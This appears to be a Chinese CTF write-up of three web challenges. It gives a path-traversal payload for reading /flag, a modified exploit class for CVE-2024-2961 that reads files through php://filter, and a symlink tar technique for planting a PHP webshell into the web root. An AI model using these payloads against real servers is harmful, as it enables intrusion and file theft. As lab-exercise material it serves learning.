web
文曲星
开启调试模式,有read 功能。打开hint之后得到了思路,采用路径穿越。使用
1
| action=command&content=%23read%20....//....//....//....//....//....//flag
|
serce
用到了CVE-2024-2961
1
2
3
4
5
6
7
8
9
| <?php
highlight_file(__FILE__);
$exp = $_GET["exp"];
if(isset($exp)){
if(serialize(unserialize($exp)) != $exp){
$data = file_get_contents($_POST['filetoread']);
echo "File Contents: $data";
}
}
|
exp可以使用数字直接绕过了。接下来把脚本的Remote类更改一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| class Remote:
def __init__(self, url: str) -> None:
self.url = url
self.session = Session()
def send(self, path: str) -> Response:
"""Sends given `path` to the HTTP server. Returns the response.
"""
url = f"{self.url}?exp=1"
return self.session.post(url, data={"filetoread": path})
def download(self, path: str) -> bytes:
"""Returns the contents of a remote file.
"""
path = f"php://filter/convert.base64-encode/resource={path}"
response = self.send(path)
data = response.re.search(b"File contents: (.*)", flags=re.S).group(1)
return base64.decode(data)
|
当时做的时候一直想把flag直接写到tmp去,失败了。看了题解发现/flag 只有读权限。
1
2
| ls -la > /tmp/1
/readflag > /tmp/1
|
filetoread = php://filter/convert.base64-encode/resource=/tmp/1
EZ_upload
没看,似乎考了软链接。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
| <?php
highlight_file(__FILE__);
function handleFileUpload($file)
{
$uploadDirectory = '/tmp/';
if ($file['error'] !== UPLOAD_ERR_OK) {
echo '文件上传失败';
return;
}
$filename = basename($file['name']);
$filename = preg_replace('/[^a-zA-Z0-9_\-\.]/', '_', $filename);
if (empty($filename)) {
echo '文件名不符合要求';
return;
}
$destination = $uploadDirectory . $filename;
if (move_uploaded_file($file['tmp_name'], $destination)) {
exec('cd /tmp && tar -xvf ' . $filename.'&&pwd');
echo $destination;
} else {
echo '文件移动失败';
}
}
handleFileUpload($_FILES['file']);
?>
|
1
2
3
4
5
6
| ln -s /var/www/html html
tar -cvf 1.tar html
rm html
mkdir html
mv shell.php html
tar -cvf 2.tar html/shell.php
|
